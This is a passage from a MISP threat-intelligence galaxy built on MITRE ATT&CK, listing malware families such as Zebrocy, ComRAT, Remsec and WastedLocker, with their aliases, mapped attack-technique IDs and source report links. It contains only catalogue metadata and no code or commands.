uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 4824. Table References
Links
https://attack.mitre.org/software/S0412
https://content.fireeye.com/apt-41/rpt-apt41
https://blogs.cisco.com/security/talos/opening-zxshell

KARAE - S0215

[KARAE](https://attack.mitre.org/software/S0215) is a backdoor typically used by [APT37](https://attack.mitre.org/groups/G0067) as first-stage malware. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="KARAE - S0215"

KARAE - S0215 is also known as:

KARAE

View relationships graph

KARAE - S0215 has relationships with:

similar: misp-galaxy:tool="KARAE" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 4825. Table References
Links
https://attack.mitre.org/software/S0215
https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

FatDuke - S0512

[FatDuke](https://attack.mitre.org/software/S0512) is a backdoor used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2016.(Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="FatDuke - S0512"

FatDuke - S0512 is also known as:

FatDuke

View relationships graph

FatDuke - S0512 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4826. Table References
Links
https://attack.mitre.org/software/S0512
https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

EvilGrab - S0152

[EvilGrab](https://attack.mitre.org/software/S0152) is a malware family with common reconnaissance capabilities. It has been deployed by [menuPass](https://attack.mitre.org/groups/G0045) via malicious Microsoft Office documents as part of spearphishing campaigns. (Citation: PWC Cloud Hopper Technical Annex April 2017)

The tag is: misp-galaxy:mitre-malware="EvilGrab - S0152"

EvilGrab - S0152 is also known as:

EvilGrab

View relationships graph

EvilGrab - S0152 has relationships with:

similar: misp-galaxy:tool="EvilGrab" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="EvilGrab" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 4827. Table References
Links
https://attack.mitre.org/software/S0152
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf

Remsec - S0125

[Remsec](https://attack.mitre.org/software/S0125) is a modular backdoor that has been used by [Strider](https://attack.mitre.org/groups/G0041) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. (Citation: Symantec Strider Blog)

The tag is: misp-galaxy:mitre-malware="Remsec - S0125"

Remsec - S0125 is also known as:

Remsec
Backdoor.Remsec
ProjectSauron

View relationships graph

Remsec - S0125 has relationships with:

similar: misp-galaxy:malpedia="Remsec" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

Table 4828. Table References
Links
https://attack.mitre.org/software/S0125
http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets
https://securelist.com/faq-the-projectsauron-apt/75533/

Zebrocy - S0251

[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: CISA Zebrocy Oct 2020)

The tag is: misp-galaxy:mitre-malware="Zebrocy - S0251"

Zebrocy - S0251 is also known as:

Zebrocy
Zekapab

View relationships graph

Zebrocy - S0251 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 4829. Table References
Links
https://attack.mitre.org/software/S0251
https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b
https://www.cyberscoop.com/apt28-brexit-phishing-accenture/
https://www.accenture.com/t20181129T203820Zw/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50[https://www.accenture.com/t20181129T203820Zw/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50]

ComRAT - S0126

[ComRAT](https://attack.mitre.org/software/S0126) is a second stage implant suspected of being a descendant of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). The first version of [ComRAT](https://attack.mitre.org/software/S0126) was identified in 2007, but the tool has undergone substantial development for many years since.(Citation: Symantec Waterbug)(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)

The tag is: misp-galaxy:mitre-malware="ComRAT - S0126"

ComRAT - S0126 is also known as:

ComRAT

View relationships graph

ComRAT - S0126 has relationships with:

similar: misp-galaxy:rat="ComRAT" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Agent.BTZ" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="Agent.BTZ" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

Table 4830. Table References
Links
https://attack.mitre.org/software/S0126
https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1
https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html
https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf

POORAIM - S0216

[POORAIM](https://attack.mitre.org/software/S0216) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) in campaigns since at least 2014. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="POORAIM - S0216"

POORAIM - S0216 is also known as:

POORAIM

View relationships graph

POORAIM - S0216 has relationships with:

similar: misp-galaxy:tool="POORAIM" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4831. Table References
Links
https://attack.mitre.org/software/S0216
https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

Catchamas - S0261

[Catchamas](https://attack.mitre.org/software/S0261) is a Windows Trojan that steals information from compromised systems. (Citation: Symantec Catchamas April 2018)

The tag is: misp-galaxy:mitre-malware="Catchamas - S0261"

Catchamas - S0261 is also known as:

Catchamas

View relationships graph

Catchamas - S0261 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 4832. Table References
Links
https://attack.mitre.org/software/S0261
https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99

Komplex - S0162

[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).

The tag is: misp-galaxy:mitre-malware="Komplex - S0162"

Komplex - S0162 is also known as:

Komplex

View relationships graph

Komplex - S0162 has relationships with:

similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

Table 4833. Table References
Links
https://attack.mitre.org/software/S0162
https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/
https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

WastedLocker - S0612

[WastedLocker](https://attack.mitre.org/software/S0612) is a ransomware family attributed to [Indrik Spider](https://attack.mitre.org/groups/G0119) that has been used since at least May 2020. [WastedLocker](https://attack.mitre.org/software/S0612) has been used against a broad variety of sectors, including manufacturing, information technology, and media.(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020)(Citation: Sentinel Labs WastedLocker July 2020)

The tag is: misp-galaxy:mitre-malware="WastedLocker - S0612"

WastedLocker - S0612 is also known as:

WastedLocker

View relationships graph

WastedLocker - S0612 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

Table 4834. Table References
Links
https://attack.mitre.org/software/S0612
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us
https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/
https://www.sentinelone.com/labs/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/

BBSRAT - S0127

[BBSRAT](https://attack.mitre.org/software/S0127) is malware with remote access tool functionality that has been used in targeted compromises. (Citation: Palo Alto Networks BBSRAT)

The tag is: misp-galaxy:mitre-malware="BBSRAT - S0127"

BBSRAT - S0127 is also known as:

BBSRAT

View relationships graph

BBSRAT - S0127 has relationships with:

similar: misp-galaxy:malpedia="BBSRAT" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002" with estimative-language:likelihood-probability="almost-certain"

Table 4835. Table References
Links
https://attack.mitre.org/software/S0127
http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/

KEYMARBLE - S0271

